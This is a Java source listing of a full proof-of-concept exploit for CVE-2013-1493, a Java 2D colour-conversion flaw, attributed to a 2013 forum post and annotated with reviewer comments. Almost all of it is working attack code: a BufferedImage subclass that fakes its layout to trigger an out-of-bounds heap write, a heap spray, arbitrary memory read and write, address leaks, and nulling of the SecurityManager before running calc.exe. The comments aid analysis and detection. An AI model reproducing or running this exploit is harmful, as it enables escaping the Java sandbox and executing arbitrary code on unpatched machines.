// Java CVE-2013-1493 exploit (forum post by "thehat", 2013-03-19; source: Pastie #6581034).
//
// SECURITY NOTE (review): this is a complete sandbox-escape proof of concept, not a library.
// Outline, as far as the code below shows it:
//   1. MyBufferedImage lies about its type / colour model / sample model, but only when the
//      caller (taken from the current stack trace) is the Java 2D colour-management layout
//      code, so the native ICC transform is handed a destination layout with a band offset
//      of 50,000,000 bytes -> out-of-bounds heap write when ColorConvertOp.filter() runs.
//   2. The heap is first sprayed with int[11] arrays; the stray write is expected to land in
//      one of them and is then turned into a sprayed array whose length field reads
//      Integer.MAX_VALUE, giving a relative read/write primitive over the heap (rdMem/wrMem).
//   3. Leak objects let the code recover object addresses; the word holding the
//      SecurityManager reference is found and zeroed, then the payload runs unsandboxed.
// The payload is Runtime.exec("calc.exe"), i.e. this build is Windows-only. Oracle addressed
// CVE-2013-1493 in its March 2013 Java SE updates (confirm the exact build against the
// advisory). The stack-trace sniffing for "ICC_Transform.getImageLayout(" in
// MyBufferedImage is a distinctive indicator for this exploit family. Lab use only.
//
// NOTE: the listing concatenates what were presumably three source files (Init.java with
// Leak, MyBufferedImage.java, MyColorSpace.java): Java does not allow import statements
// after a type declaration, so it has to be split before it will compile.
import java.applet.Applet;
import java.awt.color.ColorSpace;
import java.awt.image.BufferedImage;
import java.awt.image.ColorConvertOp;
import java.awt.image.ColorModel;
import java.awt.image.ComponentColorModel;
import java.awt.image.ComponentSampleModel;
import java.awt.image.SampleModel;

/** Applet entry point; init() drives the whole exploit chain. */
public class Init extends Applet {
    private static final long serialVersionUID = 1L;
    // Named constants for the magic values. NOTE(review): the methods below use the raw
    // literals rather than these names; keep both in sync if either is changed.
    static final int ARRAY_MAGIC = -1341411317;   // 0xB00BB00B, fill pattern of the sprayed int[11]s
    static final int ARRAY_OLDSIZE = 11;          // element count of each sprayed array
    static final int ARRAY_NEWSIZE = 2147483647;  // 0x7fffffff, length forced into the corrupted array
    static final int LEAK_MAGIC = -559035650;     // 0xDEADCAFE, marker stored in Leak.magic
    static final int SPRAY_ARRAY_COUNT = 2808685;
    static final int SPRAY_LEAK_COUNT = 2000000;
    // volatile: the scans below re-read these through memory after poking other objects,
    // presumably to keep the JIT from caching or reordering the accesses.
    volatile Leak[] _sleaks;
    volatile int[][] _sarrays;
    volatile int[] _bigArray;     // the sprayed array whose length was corrupted to 0x7fffffff
    int[] _memBaseObj;            // a sprayed array located both by index and by address
    long _memBaseIdx;             // index into _bigArray of _memBaseObj's first element
    long _memBasePtr;             // absolute address of _memBaseObj's first element
    int[] soffsets;               // source band offsets
    int[] doffsets;               // destination band offsets; the 50,000,000 is the OOB write

    public Init() {
        this.soffsets = new int[] { 0, 1, 2, 3 };
        this.doffsets = new int[] { 0, 1, 2, 50000000 };
    }

    /**
     * Heap spray: allocates SPRAY_ARRAY_COUNT int[11] arrays filled with ARRAY_MAGIC, then
     * SPRAY_LEAK_COUNT Leak objects. An OutOfMemoryError simply stops the spray early.
     * NOTE(review): after an OOM the tail of _sarrays stays null; getBigArray() dereferences
     * every entry without a null check and would then throw NullPointerException (swallowed
     * by init()'s catch-all). getMemBase() does check for null.
     */
    void spray() throws Exception {
        Runtime.getRuntime().gc();
        Runtime.getRuntime().gc();
        this._sleaks = new Leak[2000000];
        this._sarrays = new int[2808685][];
        try {
            for (int i = 0; i < this._sarrays.length; i++) {
                this._sarrays[i] = new int[11];
                for (int j = 0; j < this._sarrays[i].length; j++) {
                    this._sarrays[i][j] = -1341411317;
                }
            }
            for (int i = 0; i < this._sleaks.length; i++)
                this._sleaks[i] = new Leak("L");
        } catch (OutOfMemoryError localOutOfMemoryError) {
        }
    }

    /**
     * Locates the sprayed array damaged by the OOB write and promotes it to a huge array.
     * Pass 1 re-fills the first 11 elements of every array (only up to its current length).
     * Pass 2: in any array not yet of length 0x7fffffff, scan the first 22 elements for a
     * non-magic word directly followed by a magic word and overwrite that non-magic word with
     * 0x7fffffff. Presumably the stray write enlarged one array's length so that its elements
     * now overlap the next array's header; the non-magic word before the next array's magic
     * data is that array's length field. Pass 3 picks the array whose length is now
     * 0x7fffffff as _bigArray.
     * @throws Exception "fail" if no array ended up with the corrupted length.
     */
    void getBigArray() throws Exception {
        for (int i = 0; i < this._sarrays.length; i++) {
            for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
                this._sarrays[i][j] = -1341411317;
            }
        }
        for (int i = 0; i < this._sarrays.length; i++) {
            if (this._sarrays[i].length != 2147483647) {
                for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
                    if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
                        this._sarrays[i][(j - 1)] = 2147483647;
                    }
                }
            }
        }
        for (int i = 0; i < this._sarrays.length; i++) {
            if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647)) continue;
            this._bigArray = this._sarrays[i];
        }
        if (this._bigArray == null) throw new Exception("fail");
    }

    /**
     * Leaks the address of obj as a 32-bit word (sign-extended to long).
     * Scans _bigArray for LEAK_MAGIC; the word after it should be some Leak's obj field. To
     * confirm, every Leak's obj is set to null (word must read 0) and then to "X" (word must
     * read non-zero). On a confirmed slot obj is stored into every Leak and the slot re-read.
     * NOTE(review): _bigArray.length is 0x7fffffff after getBigArray(), so a miss walks past
     * the live heap and can crash the JVM outright instead of reaching the "fail" throw; the
     * (i + 1) read has no bound check either.
     * @throws Exception "fail" if no usable Leak slot is found.
     */
    long getAddress(Object obj) throws Exception {
        for (int i = 0; i < this._bigArray.length; i++) {
            if (this._bigArray[i] == -559035650) {
                int flag = 0;
                for (int j = 0; j < this._sleaks.length; j++)
                    this._sleaks[j].obj = null;
                flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
                for (int j = 0; j < this._sleaks.length; j++)
                    this._sleaks[j].obj = "X";
                flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
                if (flag == 2) {
                    for (int j = 0; j < this._sleaks.length; j++)
                        this._sleaks[j].obj = obj;
                    return this._bigArray[(i + 1)];
                }
            }
        }
        throw new Exception("fail");
    }

    /**
     * Establishes the index-to-address mapping used by rdMem/wrMem.
     * Each sprayed array gets its own index written into element 1. _bigArray is then scanned
     * for the pattern [length word][magic][index] and the candidate is cross-checked against
     * _sarrays[index].length. Its data index in _bigArray and its leaked address are kept;
     * +12 assumes the first element sits 12 bytes past the object address (the header size
     * this exploit targets — presumably a 32-bit HotSpot layout; confirm per JVM).
     * @throws Exception "fail" if no candidate is found or its address leaks as 0.
     */
    void getMemBase() throws Exception {
        for (int i = 0; i < this._sarrays.length; i++) {
            for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
                this._sarrays[i][j] = (j == 1 ? i : -1341411317);
            }
        }
        for (int i = 0; i < this._bigArray.length; i++) {
            if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
                int len = this._bigArray[(i - 1)];
                int idx = this._bigArray[(i + 1)];
                if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
                    this._memBaseObj = this._sarrays[idx];
                    this._memBaseIdx = i;
                    break;
                }
            }
        }
        if (this._memBaseObj == null) {
            throw new Exception("fail");
        }
        this._memBasePtr = getAddress(this._memBaseObj);
        if (this._memBasePtr == 0L) {
            throw new Exception("fail");
        }
        this._memBasePtr += 12L;
    }

    /**
     * Reads the 32-bit word at absolute address addr through _bigArray.
     * The address is converted to an element offset relative to _memBasePtr/_memBaseIdx;
     * offsets outside [0, 0x7fffffff) return 0, which is indistinguishable from a real zero.
     */
    int rdMem(long addr) {
        long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
        if ((offs >= 0L) && (offs < 2147483647L)) {
            return this._bigArray[(int)offs];
        }
        return 0;
    }

    /** Writes value to the 32-bit word at absolute address addr; out-of-range writes are dropped silently. */
    void wrMem(long addr, int value) {
        long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
        if ((offs >= 0L) && (offs < 2147483647L))
            this._bigArray[(int)offs] = value;
    }

    /** Payload: spawns calc.exe (Windows only); only meaningful once no SecurityManager is installed. */
    void privileged() {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception localException) {
            localException.printStackTrace();
        }
    }

    /**
     * Drives the exploit. Every failure is swallowed by the outer catch, so a partial run
     * leaves no trace other than a possibly crashed JVM.
     */
    public void init() {
        try {
            // Already unsandboxed: nothing to bypass.
            if (System.getSecurityManager() == null) {
                privileged();
                return;
            }
            int sWidth = 168;
            int sHeight = 1;
            int spStride = 4;                 // 4 bytes per source pixel
            int ssStride = spStride * sWidth; // one scanline of source data
            int dWidth = sWidth;
            int dHeight = sHeight;
            int dpStride = 1;
            int dsStride = 0;
            // Source image: 4-component (3 + alpha) byte raster, every sample set to 1.
            // ComponentColorModel args: hasAlpha=true, premultiplied=false, transparency 1
            // (Transparency.OPAQUE), transfer type 0 (DataBuffer.TYPE_BYTE); ColorSpace type
            // 0 is TYPE_XYZ. Real BufferedImage type 6 is TYPE_4BYTE_ABGR, fake type 0.
            ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1);
            ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
            SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
            BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
            for (int i = 0; i < ssStride; i++) {
                sbi.getRaster().getDataBuffer().setElem(i, 1);
            }
            // Destination: real type 10 (TYPE_BYTE_GRAY, one byte per pixel) but the fake
            // sample model claims four bands, the last one 50,000,000 bytes past the buffer.
            ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1);
            ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
            SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
            BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
            ColorConvertOp cco = new ColorConvertOp(null);
            spray();
            // Trigger: the colour conversion performs the OOB write; any exception is ignored
            // because the damage is expected to have happened regardless.
            try {
                cco.filter(sbi, dbi);
            } catch (Exception localException) {
            }
            getBigArray();
            getMemBase();
            long sys = getAddress(System.class);
            long sm = getAddress(System.getSecurityManager());
            // Follow the word at System.class + 4 (presumably a klass/mirror pointer), then
            // scan up to 2,000,000 words after it for the SecurityManager's address and zero
            // it; success is confirmed by getSecurityManager() returning null.
            sys = rdMem(sys + 4L);
            for (int i = 0; i < 2000000; i++) {
                long addr = sys + i * 4;
                int val = rdMem(addr);
                if (val == sm) {
                    wrMem(addr, 0);
                    if (System.getSecurityManager() == null) {
                        break;
                    }
                }
            }
            privileged();
        } catch (Exception localException1) {
        }
    }
}

/**
 * Address-leak helper. magic (0xDEADCAFE) is a marker findable in a heap scan; the obj
 * field right after it is the slot whose raw word getAddress() reads back. obj2..obj4 only
 * pad the object (their purpose is not shown here — presumably size/alignment).
 */
class Leak {
    public volatile int magic;
    public volatile Object obj;
    public volatile Object obj2;
    public volatile Object obj3;
    public volatile Object obj4;

    public Leak(Object o) {
        this.magic = -559035650;
        this.obj = o;
    }
}

import java.awt.image.BufferedImage;
import java.awt.image.ColorModel;
import java.awt.image.SampleModel;

/**
 * A BufferedImage that reports a different type, colour model and sample model depending on
 * who asks. The real values go to BufferedImage itself; the fake ones are returned only when
 * the immediate caller (stack frame [2]) is the Java 2D colour-management layout code, so
 * validation and the native transform see inconsistent layouts. This caller check is the
 * core of the CVE-2013-1493 trigger and a good detection signature.
 */
class MyBufferedImage extends BufferedImage {
    int _fakeType;
    ColorModel _fakeColorModel;
    SampleModel _fakeSampleModel;

    public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel) {
        super(width,height, imageType);
        this._fakeType = fakeType;
        this._fakeColorModel = fakeColorModel;
        this._fakeSampleModel = fakeSampleModel;
    }

    /** Fake type only for ICC_Transform.getImageLayout; otherwise the real type. */
    public int getType() {
        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
        if (caller.contains("ICC_Transform.getImageLayout(")) {
            return this._fakeType;
        }
        return super.getType();
    }

    /** Fake colour model for ICC_Transform.getImageLayout and the CMMImageLayout constructor. */
    public ColorModel getColorModel() {
        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
        if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
            return this._fakeColorModel;
        }
        return super.getColorModel();
    }

    /** Fake sample model (with the huge band offset) only for ICC_Transform.getImageLayout. */
    public SampleModel getSampleModel() {
        String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
        if (caller.contains("ICC_Transform.getImageLayout(")) {
            return this._fakeSampleModel;
        }
        return super.getSampleModel();
    }
}

import java.awt.color.ColorSpace;

/**
 * Minimal concrete ColorSpace with the requested type and component count. The conversion
 * methods are never expected to be used and just return null.
 */
class MyColorSpace extends ColorSpace {
    private static final long serialVersionUID = 1L;

    public MyColorSpace(int type, int numcomponents) {
        super(type,numcomponents);
    }

    public float[] fromCIEXYZ(float[] value) { return null; }
    public float[] toCIEXYZ(float[] value) { return null; }
    public float[] fromRGB(float[] value) { return null; }
    public float[] toRGB(float[] value) { return null; }
}